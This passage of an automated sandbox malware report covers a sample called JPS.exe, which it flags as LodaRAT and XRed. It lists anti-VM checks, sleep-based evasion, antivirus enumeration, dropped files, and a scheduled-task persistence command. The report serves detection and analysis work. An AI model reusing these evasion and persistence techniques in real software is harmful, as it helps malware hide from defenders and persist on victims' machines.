                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                              Source: C:\Users\user\Desktop\._cache_JPS.exeWindow / User API: threadDelayed 5386Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeWindow / User API: foregroundWindowGot 1649Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                              Source: C:\Users\user\Desktop\._cache_JPS.exeAPI coverage: 6.2 %
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeAPI coverage: 3.7 %
                              Source: C:\Users\user\Desktop\._cache_JPS.exe TID: 7548Thread sleep time: -53860s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8120Thread sleep count: 64 > 30Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8120Thread sleep time: -3840000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8220Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                              Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                              Source: C:\Users\user\Desktop\._cache_JPS.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\._cache_JPS.exeThread sleep count: Count: 5386 delay: -10Jump to behavior
                              Source: Yara matchFile source: 00000002.00000002.2564672501.00000000040E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.2555561177.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.2554418377.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: ._cache_JPS.exe PID: 7544, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7732, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AADD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00AADD92
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AE2044
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AE219F
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00AE24A9
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00AD6B3F
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00AD6E4A
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00ADF350
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00ADFDD2
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADFD47 FindFirstFileW,FindClose,2_2_00ADFD47
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00782044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00782044
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0078219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0078219F
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_007824A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_007824A9
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00776B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,10_2_00776B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00776E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,10_2_00776E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0077F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0077F350
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0077FD47 FindFirstFileW,FindClose,10_2_0077FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0077FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0077FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0074DD92 GetFileAttributesW,FindFirstFileW,FindClose,10_2_0074DD92
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00AAE47B
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: Amcache.hve.19.drBinary or memory string: VMware
                              Source: Amcache.hve.19.drBinary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
                              Source: Amcache.hve.19.drBinary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin
                              Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.
                              Source: Amcache.hve.19.drBinary or memory string: VMware20,1hbin@
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000051D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                              Source: Amcache.hve.19.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.19.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.19.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Amcache.hve.19.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.19.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Amcache.hve.19.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.19.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: ._cache_JPS.exe, 00000002.00000002.2559931458.0000000000E37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: Amcache.hve.19.drBinary or memory string: vmci.sys
                              Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin`
                              Source: Amcache.hve.19.drBinary or memory string: \driver\vmci,\driver\pci
                              Source: XNLAGO.exe, 00000015.00000003.1764337570.0000000001823000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                              Source: Amcache.hve.19.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: XNLAGO.exe, 00000014.00000003.1714498342.0000000001531000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:s
                              Source: Amcache.hve.19.drBinary or memory string: VMware20,1
                              Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.19.drBinary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.19.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.19.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.19.drBinary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.19.drBinary or memory string: VMware VMCI Bus Device
                              Source: Amcache.hve.19.drBinary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.19.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: Amcache.hve.19.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Users\user\Desktop\._cache_JPS.exeAPI call chain: ExitProcess graph end nodegraph_2-106108
                              Source: C:\Users\user\Desktop\._cache_JPS.exeAPI call chain: ExitProcess graph end nodegraph_2-105919
                              Source: C:\Users\user\Desktop\._cache_JPS.exeAPI call chain: ExitProcess graph end nodegraph_2-105865
                              Source: C:\Users\user\Desktop\._cache_JPS.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE703C BlockInput,2_2_00AE703C
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_00A9374E
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AC46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_00AC46D0
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00C3C140 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00C3C140
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ABA937 GetProcessHeap,2_2_00ABA937
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00AB8E3C
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB8E19 SetUnhandledExceptionFilter,2_2_00AB8E19
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00758E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00758E3C
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00758E19 SetUnhandledExceptionFilter,10_2_00758E19
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ACBE95 LogonUserW,2_2_00ACBE95
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_00A9374E
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD4B52 SendInput,keybd_event,2_2_00AD4B52
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD7DD5 mouse_event,2_2_00AD7DD5
                              Source: C:\Users\user\Desktop\JPS.exeProcess created: C:\Users\user\Desktop\._cache_JPS.exe "C:\Users\user\Desktop\._cache_JPS.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ACB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_00ACB398
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ACBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_00ACBE31
                              Source: ._cache_JPS.exe, XNLAGO.exeBinary or memory string: Shell_TrayWnd
                              Source: ._cache_JPS.exe, 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp, XNLAGO.exe, 0000000A.00000002.1445228173.00000000007DE000.00000040.00000001.01000000.00000009.sdmp, XNLAGO.exe, 0000000D.00000002.1462282550.00000000007DE000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB7254 cpuid 2_2_00AB7254
                              Source: C:\Users\user\Desktop\JPS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB40DA GetSystemTimeAsFileTime,__aulldiv,2_2_00AB40DA
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00B0C146 GetUserNameW,2_2_00B0C146
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AC2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00AC2C3C
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00AAE47B
                              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: Amcache.hve.19.drBinary or memory string: msmpeng.exe
                              Source: ._cache_JPS.exe, 00000002.00000002.2559043843.0000000000E06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\Desktop\._cache_JPS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected LodaRAT
                              Source: Yara matchFile source: Process Memory Space: ._cache_JPS.exe PID: 7544, type: MEMORYSTR
                              Yara detected XRed
                              Source: Yara matchFile source: JPS.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.JPS.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.1387520897.0000000000535000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: JPS.exe PID: 7448, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7604, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX5246.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: XNLAGO.exe, 0000000D.00000002.1464129188.000000000403A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81C
                              Source: XNLAGO.exe, 00000018.00000002.2341128073.00000000007DE000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                              Source: XNLAGO.exe, 00000015.00000002.1802294450.0000000004AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                              Source: XNLAGO.exeBinary or memory string: WIN_XP
                              Source: XNLAGO.exe, 00000014.00000002.1721312640.0000000004991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81=
                              Source: XNLAGO.exe, 00000018.00000002.2351605635.00000000046A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81g
                              Source: XNLAGO.exeBinary or memory string: WIN_XPe
                              Source: XNLAGO.exeBinary or memory string: WIN_VISTA
                              Source: XNLAGO.exe, 0000000A.00000003.1411593075.0000000004ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81L
                              Source: XNLAGO.exeBinary or memory string: WIN_7
                              Source: XNLAGO.exeBinary or memory string: WIN_8
                              Source: Yara matchFile source: Process Memory Space: ._cache_JPS.exe PID: 7544, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Yara detected LodaRAT
